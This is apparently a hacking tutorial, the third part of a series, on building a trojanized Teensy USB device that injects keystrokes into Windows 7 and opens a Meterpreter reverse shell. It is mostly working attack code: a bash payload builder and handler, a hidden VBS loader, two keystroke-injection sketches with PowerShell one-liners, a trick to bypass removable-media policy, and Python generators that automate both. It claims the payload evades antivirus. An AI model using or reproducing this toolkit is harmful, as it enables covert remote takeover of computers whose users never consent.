Teensy++2.0 Metasploit Part 3

One line to rule them all, one line to find them, one line to bring them all and in the darkness bind them.

Okay, so this is my final shot at the trojanized USB Teensy device: making it as invisible as possible to the user's eye on the target system (Windows 7 in this example). The Windows 7 environment has the classic domain restrictions: disabled cmd.exe, disabled Win+R, antivirus software, etc.

I will show two scenarios here: Windows 7 with "Run" enabled in the Start menu, and Windows 7 without "Run" and only the search box. Both scenarios assume that powershell.exe is permitted on the system and that the domain admins did not disable it.

Here is my wrapper script that generates the Meterpreter payload and handles all the encoding. As usual, put it in your Metasploit root folder, make it executable, change the tun0 network interface inside the script to your needs and change the path to your Arduino trojaned-usbdrive project folder.

This works with the Metasploit current SVN sources up to rev 13385; later versions are somewhat broken, so please stick to this one or svn up -r 13385 for now.

Update: works now as of the Metasploit 4.0 release, svn r13473.

#!/bin/bash
# Builds the alphanumeric Meterpreter stager, wraps it in a VBS loader for
# ShellcodeExec (renamed a.exe on the USB disk) and starts the handler.
# Run it from the Metasploit root folder.
echo "************************************************************"
echo "           Automatic shellcode generator                    "
echo "                                                            "
echo "************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IP="" # store IP
case $OS in
   Linux) IP=`ifconfig tun0  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   FreeBSD|OpenBSD) IP=`ifconfig  tun0 | grep -E 'inet.[0-9]' | grep -v '127.0.0.1' | awk '{ print $2}'` ;;
   SunOS) IP=`ifconfig -a | grep inet | grep -v '127.0.0.1' | awk '{ print $2} '` ;;
   *) IP="Unknown";;
esac
if [ -z "$IP" ] || [ "$IP" = "Unknown" ]; then
   echo "Could not read the tun0 address, change the interface name in this script"
   exit 1
fi
#echo "$IP"
# alpha_mixed with BufferRegister=EAX yields a purely alphanumeric blob (no
# non-alphanumeric GetPC stub); ShellcodeExec loads the buffer address into EAX itself.
./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode -e x86/alpha_mixed -t raw BufferRegister=EAX > alphacode

if [ ! -d "ShellCode" ]; then
mkdir ShellCode
fi
mv alphacode ShellCode
# creating the vbs loader: it works out its own directory so a.exe is found
# whatever drive letter the USB disk gets, then runs a.exe <shellcode> hidden
echo 'Set oShell = CreateObject("Wscript.shell") ' > ShellCode/exec.vbs
echo 'sPath=Wscript.ScriptFullName' >> ShellCode/exec.vbs
echo 'x=InstrRev(sPath, "\")' >> ShellCode/exec.vbs
echo 'sPath=Left(sPath,x)' >> ShellCode/exec.vbs
echo -e 'sCmd = sPath+"a.exe \c' >> ShellCode/exec.vbs
cat ShellCode/alphacode >> ShellCode/exec.vbs
echo '"' >> ShellCode/exec.vbs
echo ' oShell.Run sCmd,0,False' >> ShellCode/exec.vbs
# convert to CRLF line endings (todos from the tofrodos package; unix2dos does the same)
todos ShellCode/exec.vbs
mv ShellCode/exec.vbs /home/knoppix/arduino-0022/trojaned_usbdrive/disk

# start the handler; the migrate script takes the target process name via -n
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate -n explorer.exe'  E

So what happens here is our usual stuff: generating the alpha_mixed-encoded payload, putting it into the ShellCode directory, generating the VBS loader and moving it to the trojaned-usbdrive project folder for Teensy deployment. The loader's Run call uses window style 0 (hidden) and does not wait, so nothing flashes on screen. We must not forget the ShellcodeExec binary, which I've renamed simply to a.exe and placed in the disk folder within the trojaned-usbdrive project folder.
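The VBS loader only works if the blob appended to the a.exe command line is purely alphanumeric and short enough for CreateProcess; the bash script above does not check either. As an added example (not the page's own script), here is a Python version of the loader generation that validates the msfencode output, keeps the CRLF endings that todos would produce, and refuses blobs that would not survive the command line. It assumes the raw x86/alpha_mixed output produced with BufferRegister=EAX as input and ShellcodeExec sitting next to exec.vbs as a.exe; the E:\ drive letter used for the length check is only an assumption, since the loader resolves the real one at run time.

```python
#!/usr/bin/env python3
"""Build the exec.vbs loader for ShellcodeExec from an alphanumeric payload blob.

Added example, not the bash script from the page. Assumptions: the input is the
raw msfencode x86/alpha_mixed output generated with BufferRegister=EAX, and the
ShellcodeExec binary sits next to exec.vbs on the USB disk under the name a.exe.
"""
import string
import sys

ALPHANUM = frozenset((string.ascii_letters + string.digits).encode())
# Upper bound CreateProcess accepts for a command line; Wscript.Shell.Run goes
# through it, so drive path + a.exe + blob has to stay below this.
MAX_CMDLINE = 32767


def is_alphanumeric(shellcode: bytes) -> bool:
    """True if every byte is [A-Za-z0-9]; anything else (NUL, space, quotes)
    would be mangled or truncated once the blob is passed to a.exe as argv[1]."""
    return bool(shellcode) and set(shellcode) <= ALPHANUM


def cmdline_length(shellcode: bytes, mount_dir: str = "E:\\", exe_name: str = "a.exe") -> int:
    """Length of the command line Wscript.Shell.Run hands to CreateProcess.
    mount_dir is an assumed drive letter; the loader resolves the real one at run time."""
    return len(mount_dir) + len(exe_name) + 1 + len(shellcode)


def build_vbs_loader(shellcode: bytes, exe_name: str = "a.exe") -> str:
    """Return the exec.vbs text with CRLF line endings (what todos produces)."""
    blob = shellcode.strip()
    if not is_alphanumeric(blob):
        bad = bytes(sorted(set(blob) - ALPHANUM))
        raise ValueError("shellcode is not purely alphanumeric: %r" % bad)
    if cmdline_length(blob, exe_name=exe_name) >= MAX_CMDLINE:
        raise ValueError("command line would exceed the CreateProcess limit")
    lines = [
        'Set oShell = CreateObject("Wscript.Shell")',
        # ScriptFullName is e.g. E:\exec.vbs; keep everything up to the last
        # backslash so a.exe is found regardless of the assigned drive letter.
        "sPath = Wscript.ScriptFullName",
        'x = InstrRev(sPath, "\\")',
        "sPath = Left(sPath, x)",
        'sCmd = sPath & "%s %s"' % (exe_name, blob.decode("ascii")),
        "oShell.Run sCmd, 0, False",  # 0 = hidden window, False = do not wait
    ]
    return "\r\n".join(lines) + "\r\n"


def main(argv):
    if len(argv) != 3:
        sys.stderr.write("usage: %s alphacode exec.vbs\n" % argv[0])
        return 2
    with open(argv[1], "rb") as f:
        shellcode = f.read()
    vbs = build_vbs_loader(shellcode)
    # Write bytes so Python does not translate the CRLF endings back to LF.
    with open(argv[2], "wb") as f:
        f.write(vbs.encode("ascii"))
    sys.stderr.write("wrote %s (%d bytes of shellcode)\n" % (argv[2], len(shellcode.strip())))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Usage is `python3 make_loader.py ShellCode/alphacode exec.vbs`; the output can then be dropped into the disk folder in place of the one the bash script writes. A blob that fails `is_alphanumeric` usually means msfencode was run without BufferRegister=EAX, which leaves the non-alphanumeric GetPC stub at the front.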

The first scenario, with Run enabled, is the stealthiest and a true one-liner:

#include <phukdlib.h>

void setup() {
}

void loop () {
  delay(9000);                               // let Windows enumerate the HID device first
  Keyboard.set_modifier(MODIFIERKEY_CTRL);   // Ctrl+Esc opens the Start menu
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);                  // release everything
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  Keyboard.print("powershell -Command");
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);  // Shift+' = opening double quote (US layout)
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);  // closing double quote
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_SEMICOLON);          // ';' and '\' are sent as key codes rather than via print()
  Keyboard.send_now();
  Keyboard.print("$drive = $disk.substring(2,2)");
  Keyboard.set_key1(KEY_SEMICOLON);
  Keyboard.send_now();
  Keyboard.print("invoke-expression $drive");
  Keyboard.set_key1(KEY_BACKSLASH);
  Keyboard.send_now();
  Keyboard.print("exec.vbs");
  PressAndRelease(KEY_ENTER, 1);             // run the one-liner
  delay(2000);
  Keyboard.print("exit");
  PressAndRelease(KEY_ENTER, 1);
  delay(9000000);                            // park here so the payload is typed only once
}

What happens here is simple: open the Start menu (Ctrl+Esc) and type the following one-liner into the Run field. The select-string pattern matches the volume label of the Teensy's mass storage (tinydisk) and substring(2,2) pulls the drive letter and colon out of that line, so the drive letter does not need to be known in advance:

powershell -Command "$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string" ; $drive = $disk.substring(2,2); invoke-expression $drive\exec.vbs

In case Local Group Policy disables execution from removable mass storage, copy the disk contents to %TEMP% and run the loader from there instead ;)
powershell -Command "$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string" ; $drive = $disk.substring(2,2); copy $drive\* $env:temp ;invoke-expression $env:temp\exec.vbs

It's quick and silent, and at the time of writing it gets past almost all antivirus software, since the Meterpreter stager only exists as alphanumeric text inside a plain script file.

The second scenario is the restricted environment where we don't have the Run option in the Start menu.

We can search but we can't run ;) so we search for powershell, let it run our script in one line and close it quickly so it does not raise any suspicion.

#include <phukdlib.h>

void setup() {
}

void loop () {
  delay(9000);                               // let Windows enumerate the HID device first
  Keyboard.set_modifier(MODIFIERKEY_CTRL);   // Ctrl+Esc opens the Start menu with focus in the search box
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(400);
  Keyboard.print("powershell ");
  PressAndRelease(KEY_ENTER, 1);             // launch the first search hit
  delay(2000);                               // wait for the prompt
  Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
  Keyboard.set_key1(KEY_SEMICOLON);
  Keyboard.send_now();
  Keyboard.print("$drive = $disk.substring(2,2)");
  Keyboard.set_key1(KEY_SEMICOLON);
  Keyboard.send_now();
  Keyboard.print("invoke-expression $drive");
  Keyboard.set_key1(KEY_BACKSLASH);
  Keyboard.send_now();
  Keyboard.print("exec.vbs");
  PressAndRelease(KEY_ENTER, 1);
  delay(2000);
  Keyboard.print("exit");                    // close the console window again
  PressAndRelease(KEY_ENTER, 1);
  delay(9000000);                            // park here so the payload is typed only once
}

What happens here is simple: Ctrl+Esc opens the Start menu, we search for powershell, launch it and run the following script at the prompt:

$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string ; $drive = $disk.substring(2,2); invoke-expression $drive\exec.vbs

It's less silent, as the PowerShell window stays open for a while, but it's still pretty good for what it does.
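Both sketches above are typed out key by key, and every quote, semicolon and backslash needs its own set_modifier/set_key1/send_now dance. As an added example (not the page's own code, and serving both the Run-field and the search-then-prompt variants), here is a small Python generator that emits such a sketch from the command line string: plain runs of characters are batched into Keyboard.print(), while the characters the page types with explicit key codes (double quote, semicolon, backslash) get the same explicit sequences. It assumes the Teensyduino key names used on the page and a US keyboard layout; the timing values are copied from the sketches.

```python
#!/usr/bin/env python3
"""Emit a Teensy (phukdlib) sketch that types a command line into Windows.

Added example, not the page's hand-written sketches. Assumes the Teensyduino
key names and a US keyboard layout; characters the page types with explicit
set_key1() calls (double quote, semicolon, backslash) are handled the same way
here, everything else goes through Keyboard.print().
"""

# (modifier, key) for characters typed with explicit key codes instead of print().
SPECIAL = {
    '"': ("MODIFIERKEY_SHIFT", "KEY_QUOTE"),
    ";": (None, "KEY_SEMICOLON"),
    "\\": (None, "KEY_BACKSLASH"),
}

# The two command lines from the page: one for the Run field, one for an
# interactive PowerShell prompt reached through Start menu search.
RUN_BOX_CMD = (
    'powershell -Command "$disk = wmic logicaldisk list brief | '
    'select-string -pattern tinydisk | out-string" ; '
    '$drive = $disk.substring(2,2); invoke-expression $drive\\exec.vbs'
)
PROMPT_CMD = (
    "$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string ; "
    "$drive = $disk.substring(2,2); invoke-expression $drive\\exec.vbs"
)


def press(modifier, key):
    """One key press: set modifier (if any) and key, report, then release both."""
    lines = []
    if modifier:
        lines += [f"  Keyboard.set_modifier({modifier});", "  Keyboard.send_now();"]
    lines += [f"  Keyboard.set_key1({key});", "  Keyboard.send_now();",
              "  Keyboard.set_modifier(0);", "  Keyboard.set_key1(0);",
              "  Keyboard.send_now();"]
    return lines


def c_string(text):
    """Quote text as a C string literal for Keyboard.print()."""
    return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'


def keystrokes(cmd):
    """Turn a command line into Keyboard.* calls, batching plain runs into print()."""
    lines, run = [], ""
    for ch in cmd:
        if ch in SPECIAL:
            if run:
                lines.append(f"  Keyboard.print({c_string(run)});")
                run = ""
            lines += press(*SPECIAL[ch])
        else:
            run += ch
    if run:
        lines.append(f"  Keyboard.print({c_string(run)});")
    return lines


def sketch(cmd, via_search=False, boot_delay_ms=9000):
    """Full sketch: wait for the device to enumerate, Ctrl+Esc, then type cmd.

    via_search=False types cmd straight into the Start menu / Run field.
    via_search=True searches for powershell first, runs cmd at the prompt and
    types exit afterwards so the console window goes away.
    """
    body = [f"  delay({boot_delay_ms});"]
    body += press("MODIFIERKEY_CTRL", "KEY_ESC")  # open the Start menu
    if via_search:
        body += ["  delay(400);", '  Keyboard.print("powershell ");',
                 "  PressAndRelease(KEY_ENTER, 1);", "  delay(2000);"]
    else:
        body += ["  delay(1000);"]
    body += keystrokes(cmd) + ["  PressAndRelease(KEY_ENTER, 1);"]
    if via_search:
        body += ["  delay(2000);", '  Keyboard.print("exit");',
                 "  PressAndRelease(KEY_ENTER, 1);"]
    body += ["  delay(9000000);  // park loop() so the payload is typed only once"]
    return "\n".join(["#include <phukdlib.h>", "", "void setup() {", "}", "",
                      "void loop() {"] + body + ["}", ""])


if __name__ == "__main__":
    import sys
    search = "--search" in sys.argv
    print(sketch(PROMPT_CMD if search else RUN_BOX_CMD, via_search=search))
```

`python3 gen_sketch.py > trojaned_usbdrive.pde` produces the Run-field variant and `--search` the prompt variant; paste the output into the Arduino IDE as before. Any other character that misbehaves with Keyboard.print() on a given layout can be added to SPECIAL with its key code.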

Please keep in mind that exec.vbs is created by the shell script above, which needs to be in the Metasploit root folder; you may also need todos installed to convert the final exec.vbs to DOS (CRLF) line endings.

Well, this is all I could come up with on this subject. I hope you enjoy your shells!

Micro Credo:
Never trust a computer bigger than you can lift.
